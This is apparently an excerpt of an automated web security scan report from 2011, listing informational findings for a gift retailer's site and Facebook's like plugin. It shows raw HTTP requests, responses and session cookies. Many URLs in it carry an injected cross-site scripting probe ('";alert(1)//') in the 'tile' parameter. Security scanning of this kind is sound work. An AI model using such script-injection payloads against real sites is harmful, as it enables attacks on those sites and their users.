src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_REDE_FOB.gif" alt="The place for unique and personalized gifts." border="0" /></a>
...[SNIP]...
<a class="LogoSpacer" border="0" title="Farm fresh fruit, gift baskets and delicious hand-made sweets." rel="nofollow"><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_CMF_FOB.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" /></a> <a class="LogoSpacer" title="Unique personalized gifts for life...s special occasions." border="0" rel="nofollow" href="http://www.personalcreations.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_PCR_FOB.gif" alt="Unique personalized gifts for life...s special occasions." border="0" /></a> <a class="LogoSpacer" title="Gourmet hand-dipped berries, cookies and cakes." border="0" rel="nofollow" href="http://www.berries.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_SHB_FOB.gif" alt="Gourmet hand-dipped berries, cookies and cakes." border="0" /></a>
...[SNIP]...
<div class="LibertyMediaLinks">
        Other Liberty Media Brands and Services:
        <a href="http://www.berries.com" style="margin:0 10px 0 5px; color:#6e7831;">Hand-Dipped Strawberries</a>|
        <a href="http://www.redenvelope.com" style="margin:0 10px 0 5px; color:#6e7831;">Gifts</a>|
        <a href="http://www.buycostumes.com" style="margin:0 10px 0 5px; color:#6e7831;">Halloween Costumes</a>
...[SNIP]...
</center>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li><a style="color: #0000FF" href="http://www.facebook.com/CherryMoonFarms" />Cherry Moon Farms Facebook</a>
...[SNIP]...
16.27. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a5dfe874%26origin%3Dhttp%253A%252F%252Fwww.ftd.com%252Ff1fcffb74%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2FFTDFlowers&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.137.43.128
X-Cnection: close
Date: Mon, 09 May 2011 01:00:37 GMT
Content-Length: 8755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
16.28. http://www.personalcreations.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.personalcreations.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=wz0kwfor3fvne2lfjnllwoah; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=wz0kwfor3fvne2lfjnllwoah; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-1,ttb-3,nte-3,ntc-2,tpr-1,ntb-1,xta-1,tpp-4,tbc-2,ntd-1,xtc-1,tmm-1,xtb-1,trr-2,tvo-1,tpf-1; domain=.personalcreations.com; expires=Sat, 09-Jun-2012 12:23:17 GMT; path=/
Set-Cookie: ENDOFDAY_PCR=TestAssignmentValues=,txb-1,tkt-2,thp-2,txa-2,tks-1,txc-1,mpsmediapersonalitysplit-2; domain=.personalcreations.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=5/9/2011 5:23:17 AM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=5; domain=.personalcreations.com; expires=Thu, 12-May-2011 12:23:17 GMT; path=/
Set-Cookie: PCR_BrowserId=7e39bf7a-035a-482a-a5ba-f1400b3f220a; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:23:19 GMT
Content-Length: 120465


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_default.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="outerContainer">
               

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>


<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/favicon.ico"/>

<div id="Header">
...[SNIP]...
<a id="_ctl9__homeLink" border="0" title="Go to Personal Creations Homepage" href="http://www.personalcreations.com/sitemap.aspx?Ref=HomeNoRef" style="height:78px;width:212px;"><img height="78px" width="212px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Go to Personal Creations Homepage" border="0" /></a>
...[SNIP]...
<li><a rel="nofollow" class="HeaderLink" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?Ref=HomeNoRef&amp;cobrand=PCR">Your Account</a>
...[SNIP]...
<li><a rel="nofollow" class="HeaderLink" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?Ref=HomeNoRef&amp;cobrand=PCR">Order Tracking</a>
...[SNIP]...
<a id="_ctl9__ctl7_lkCart" class="SecondaryColor HeaderLink" href="http://gifts.personalcreations.com/ShoppingCart.aspx?Ref=HomeNoRef"><img style="border:0 none;" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Shopping Cart" />&nbsp;&nbsp;shopping cart&nbsp;0</a>
...[SNIP]...
<div id="TopNav"> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/common_pcr.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
_ctl14_submit" prvdid="productsearchlink" rel="nofollow" type="image" href="http://www.personalcreations.com/ProductSearch.aspx?Ref=HomeNoRef" style="height:21px;width:41px;display:inline;float:left;"><img class="sch_smallGo" height="21px" width="41px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="heroElements">
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js"></script>
...[SNIP]...
<a id="_ctl11_DHero_rptSlides__ctl0_herolink" border="0" href="/personalized-mothers-day-gifts-PMOMDAY?tile=hmpg_hero1&amp;Ref=HomeNoRef" target="_self"><img id="_ctl11_DHero_rptSlides__ctl0_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/758x310_PCHero_Slide1_BelatedMday11.jpg" alt="Shop Bestselling Mother&#39;s Day Gifts" border="0" /></a>
...[SNIP]...
<a id="_ctl11_DHero_rptSlides__ctl1_herolink" border="0" href="/personalized-communion-gifts-PCOMMUN?tile=hmpg_hero2&amp;Ref=HomeNoRef" target="_self"><img id="_ctl11_DHero_rptSlides__ctl1_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/firstcommunion-slide-copy.jpg" alt="Shop Bestselling First Communion Gifts" border="0" /></a>
...[SNIP]...
<a id="_ctl11_DHero_rptSlides__ctl2_herolink" border="0" href="/personalized-kids-gifts-PBKDBSL?tile=hmpg_hero3&amp;Ref=HomeNoRef" target="_self"><img id="_ctl11_DHero_rptSlides__ctl2_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/758x310_PCHero_Slide4_BabyKidsQuilts.jpg" alt="Shop Bestselling Baby &amp; Kids Gifts" border="0" /></a>
...[SNIP]...
<a id="_ctl11_DHero_rptSlides__ctl3_herolink" border="0" href="/personalized-anniversary-gifts-PANNBSL?tile=hmpg_hero4&amp;Ref=HomeNoRef" target="_self"><img id="_ctl11_DHero_rptSlides__ctl3_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/758x310_PCHero_Slide3_Anniv.jpg" alt="Shop Bestselling Anniversary Gifts" border="0" /></a>
...[SNIP]...
<a id="_ctl11_TopPodHyperlink" border="0" href="/personalized-graduation-gifts-PGRADUA?tile=hmpg_topHeroPod&amp;Ref=HomeNoRef" target="_self"><img id="_ctl11_TopPodImage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PC_PodA_193x154_Mday_0421.jpg" alt="Shop Bestselling Graduation Gifts" border="0" style="height:154px;width:193px;" /></a>
...[SNIP]...
<a id="_ctl11_BottomPodHyperlink" border="0" href="/personalized-birthday-gifts-PBIRBSL?tile=hmpg_bottomHeroPod&amp;Ref=HomeNoRef" target="_self"><img id="_ctl11_BottomPodImage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PC_RightTopHeroPod_Birthday.jpg" alt="Shop Bestselling Birthday Gifts" border="0" style="height:154px;width:193px;" /></a>
...[SNIP]...
alcreations.com/gifts/Heart-Stepping-Stone-30016152?viewpos=1&amp;trackingpgroup=PHMPG01&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0065857b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Heart Stepping Stone" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-0_0.gif" border="0" />
           
           <span id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl0__ctl0__noCustomerReviews" class="SmallSize ReviewWrapper" style="color:#990000;font-weight:bold;">
...[SNIP]...
alcreations.com/gifts/Tender-Heart-Platter-30028686?viewpos=2&amp;trackingpgroup=PHMPG01&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0102761b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Tender Heart Platter" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-3_3.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ons.com/gifts/Reasons-IWe-Love-Photo-Frame-30024035?viewpos=3&amp;trackingpgroup=PHMPG01&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D946_103270_W1?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Reasons I/We Love Photo Frame" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_3.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
eations.com/gifts/MY-MOMMYS-EMBRACE-PRINTS-30016923?viewpos=4&amp;trackingpgroup=PHMPG01&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007H4854_70842_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="My Mommy&#39;s Embrace Prints" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_8.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ifts/Oversized-Metal-Family-Tree-Sculpture-30021353?viewpos=5&amp;trackingpgroup=PHMPG01&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009D282_88198_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Oversized Metal Family Tree Sculpture" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-5_0.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
com/gifts/CommunionConfirmation-Wall-Cross-30015952?viewpos=1&amp;trackingpgroup=PHMPG02&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0063828b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Communion/Confirmation Wall Cross" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_1.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
om/gifts/CommunionConfirmation-Glass-Frame-30015469?viewpos=2&amp;trackingpgroup=PHMPG02&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054324b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Communion/Confirmation Glass Frame" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_9.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ations.com/gifts/First-Communion-Gift-Sets-30026755?viewpos=3&amp;trackingpgroup=PHMPG02&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0049189b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="First Communion Gift Sets" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_5.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
m/gifts/CommunionConfiramtion-Keepsake-Box-30019169?viewpos=4&amp;trackingpgroup=PHMPG02&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0085988b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Communion/Confirmation Keepsake Box" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_9.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
s/Childrens-Catholic-Bible--Burgundy-Cover-30020916?viewpos=5&amp;trackingpgroup=PHMPG02&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0007703b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Children&#39;s Catholic Bible - Burgundy Cover" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-5_0.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
lcreations.com/gifts/Graduation-Wall-Cross-30021213?viewpos=1&amp;trackingpgroup=PHMPG03&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073650b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Graduation Wall Cross" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-3_0.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ations.com/flowers/Graduation-Tassel-Frame-30049637?viewpos=2&amp;trackingpgroup=PHMPG03&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009D183X_087921_W1?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Graduation Tassel Frame" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-0_0.gif" border="0" />
           
           <span id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl1__ctl0__noCustomerReviews" class="SmallSize ReviewWrapper" style="color:#990000;font-weight:bold;">
...[SNIP]...
s.com/gifts/School-Color-Graduation-Banner-30021331?viewpos=3&amp;trackingpgroup=PHMPG03&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0087026b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="School Color Graduation Oversized Banner" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-5_0.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
nalcreations.com/gifts/Graduation-Bracelet-30028362?viewpos=4&amp;trackingpgroup=PHMPG03&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0074868b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Graduation Bracelet" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-5_0.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
